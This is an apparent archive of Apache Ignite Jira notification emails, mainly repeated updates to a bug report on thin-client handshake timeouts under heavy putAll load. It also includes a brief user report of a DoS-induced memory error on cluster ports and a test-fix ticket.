 Project: Ignite
  Issue Type: Bug
  Components: persistence
Reporter: Roman Puchkovskiy
 Fix For: 3.0.0-alpha5






--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 70-100 at the same time) thin clients loading data using 
putAlls in 5 records batches. Client connects, loads 3 batches and 
disconnects (spark jobs in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate  the problem 
({*}ignitetest/tests/thin_client_concurrency{*}).

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot the behaviour of the test is shown in 
details:

1. The first thin client invoked and started data load with putAlls in several 
threads
2. The second thin client is invoked once the queue is filled
3. After 10 seconds the session of the second client is closed
4. Executor takes the handshake request from queue and (erroneously?) increases 
the _client_connector_AcceptedSessions_ metric (note that _ActiveSessions _ 
wasn't increased).

[^test_one_greedy_thin_client.png]

 

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Commented] (IGNITE-16741) DoS attacks on ignite ports

2022-04-13 Thread Aleksandr Polovtcev (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16741?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521582#comment-17521582
 ] 

Aleksandr Polovtcev commented on IGNITE-16741:
--

[~bdq], thank you for reporting this issue. However, I was not able to 
reproduce this error with the aforementioned script. Can you please provide a 
little more information, like the full script code and your Ignite 
configuration? 

> DoS attacks on ignite ports
> ---
>
> Key: IGNITE-16741
> URL: https://issues.apache.org/jira/browse/IGNITE-16741
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.11.1
>Reporter: biandeqiang
>Assignee: Aleksandr Polovtcev
>Priority: Critical
>  Labels: ise
>
> DoS attacks on ignite's TcpCommunicationSpi and TcpDiscoverySpi's ports
> The ignite I use is embedded,ignite uses two ports, When I was testing a dos 
> attack on the port, ignite had java.lang.OutOfMemoryError: Direct buffer 
> memory.
> TcpDiscoverySpi spi = new TcpDiscoverySpi();
> spi.setLocalPort("port")
> TcpCommunicationSpi ipCom = new TcpCommunicationSpi();
> ipCom.setLocalPort("port")
>  
> {{[2021-12-01 14:12:59,056][WARN 
> ][0][0][grid-nio-worker-tcp-comm-4-#43%TcpCommunicationSpi%][ROOT][IgniteLoggerImp][88]
>  Caught unhandled exception in NIO worker thread (restart the node). 
> java.lang.OutOfMemoryError: Direct buffer memory
> at java.nio.Bits.reserveMemory(Bits.java:695)
> at java.nio.DirectByteBuffer.(DirectByteBuffer.java:123)
> at java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:311)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.register(GridNioServer.java:2672)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.bodyInternal(GridNioServer.java:2089)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.body(GridNioServer.java:1910)
> at org.apache.ignite.internal.util.worker.GridWorker.run(GridWorker.java:120)
> at java.lang.Thread.run(Thread.java:748)}}
>  
> I hope Ignite can also add MaxConnect as Tomcat and set a counter. If the 
> counter exceeds the value, wait for several seconds.{{{}{}}}



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 70-100 at the same time) thin clients loading data using 
putAlls in 5 records batches. Client connects, loads 3 batches and 
disconnects (spark jobs in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration



Two ducktests were created to reproduce and isolate  the problem.

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot the behaviour of the test is shown in 
details:

1. The first thin client invoked and started data load with putAlls in several 
threads
2. The second thin client is invoked once the queue is filled
3. After 10 seconds the session of the second client is closed
4. Executor takes the handshake request from queue and (erroneously?) increases 
the _client_connector_AcceptedSessions_ metric (note that _ActiveSessions _ 
wasn't increased).


!test_one_greedy_thin_client.png|thumbnail,width=200,height=150!

 



The following full stack trace is logged on the client side:

{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Commented] (IGNITE-16844) Fix IgniteOptimizationAggregationFuncSpec

2022-04-13 Thread Nikolay Izhikov (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16844?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521581#comment-17521581
 ] 

Nikolay Izhikov commented on IGNITE-16844:
--

https://ci2.ignite.apache.org/viewLog.html?buildId=6390267=queuedBuildOverviewTab

> Fix IgniteOptimizationAggregationFuncSpec
> -
>
> Key: IGNITE-16844
> URL: https://issues.apache.org/jira/browse/IGNITE-16844
> Project: Ignite
>  Issue Type: Bug
>Reporter: Nikolay Izhikov
>Assignee: Nikolay Izhikov
>Priority: Minor
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> IgniteOptimizationAggregationFuncSpec fails after 
> https://github.com/apache/ignite/commit/03c466bc8fe6c90fc0a3c2cfac3fdf649a41b49e



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 70-100 at the same time) thin clients loading data using 
putAlls in 5 records batches. Client connects, loads 3 batches and 
disconnects (spark jobs in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration



Two ducktests were created to reproduce and isolate  the problem.

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot the behaviour of the test is shown in 
details:

1. The first thin client invoked and started data load with putAlls in several 
threads
2. The second thin client is invoked once the queue is filled
3. After 10 seconds the session of the second client is closed
4. Executor takes the handshake request from queue and (erroneously?) increases 
the _client_connector_AcceptedSessions_ metric (note that _ActiveSessions _ 
wasn't increased).


!test_one_greedy_thin_client.png|thumbnail,width=200,height=200!

 



The following full stack trace is logged on the client side:

{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 70-100 at the same time) thin clients loading data using 
putAlls in 5 records batches. Client connects, loads 3 batches and 
disconnects (spark jobs in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate  the problem.

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot the behaviour of the test is shown in 
details:

1. The first thin client invoked and started data load with putAlls in several 
threads
2. The second thin client is invoked once the queue is filled
3. After 10 seconds the session of the second client is closed
4. Executor takes the handshake request from queue and (erroneously?) increases 
the _client_connector_AcceptedSessions_ metric (note that _ActiveSessions _ 
wasn't increased).


!test_one_greedy_thin_client.png!

 

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Assigned] (IGNITE-16844) Fix IgniteOptimizationAggregationFuncSpec

2022-04-13 Thread Nikolay Izhikov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16844?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nikolay Izhikov reassigned IGNITE-16844:


Assignee: Nikolay Izhikov

> Fix IgniteOptimizationAggregationFuncSpec
> -
>
> Key: IGNITE-16844
> URL: https://issues.apache.org/jira/browse/IGNITE-16844
> Project: Ignite
>  Issue Type: Bug
>Reporter: Nikolay Izhikov
>Assignee: Nikolay Izhikov
>Priority: Minor
>
> IgniteOptimizationAggregationFuncSpec fails after 
> https://github.com/apache/ignite/commit/03c466bc8fe6c90fc0a3c2cfac3fdf649a41b49e



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16844) Fix IgniteOptimizationAggregationFuncSpec

2022-04-13 Thread Nikolay Izhikov (Jira)
Nikolay Izhikov created IGNITE-16844:


 Summary: Fix IgniteOptimizationAggregationFuncSpec
 Key: IGNITE-16844
 URL: https://issues.apache.org/jira/browse/IGNITE-16844
 Project: Ignite
  Issue Type: Bug
Reporter: Nikolay Izhikov


IgniteOptimizationAggregationFuncSpec fails after 
https://github.com/apache/ignite/commit/03c466bc8fe6c90fc0a3c2cfac3fdf649a41b49e





--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 70-100 at the same time) thin clients loading data using 
putAlls in 5 records batches. Client connects, loads 3 batches and 
disconnects (spark jobs in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate  the problem.

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot the behaviour of the test is shown in 
details:

1. The first thin client invoked and started data load with putAlls in several 
threads
2. The second thin client is invoked once the queue is filled
3. After 10 seconds the session of the second client is closed
4. Executor takes the handshake request from queue and (erroneously?) increases 
the _client_connector_AcceptedSessions_ metric (note that _ActiveSessions _ 
wasn't increased).

!test_one_greedy_thin_client.png|thumbnail!

 

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 70-100 at the same time) thin clients loading data using 
putAlls in 5 records batches. Client connects, loads 3 batches and 
disconnects (spark jobs in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate  the problem.

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot shows the behaviour of the test in details:

!test_one_greedy_thin_client.png|thumbnail, width=300,height=400!

 

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at org.apache.ignite.Ignition.startClient(Ignition.java:615) ~[classes/:?]
at 
org.apache.ignite.internal.ducktest.tests.thin_client_test.ThinClientDataGenerationApplication$PutJob.getClient(ThinClientDataGenerationApplication.java:181)
 ~[ignite-ducktests-2.
14.0-SNAPSHOT.jar:2.14.0-SNAPSHOT]
at 

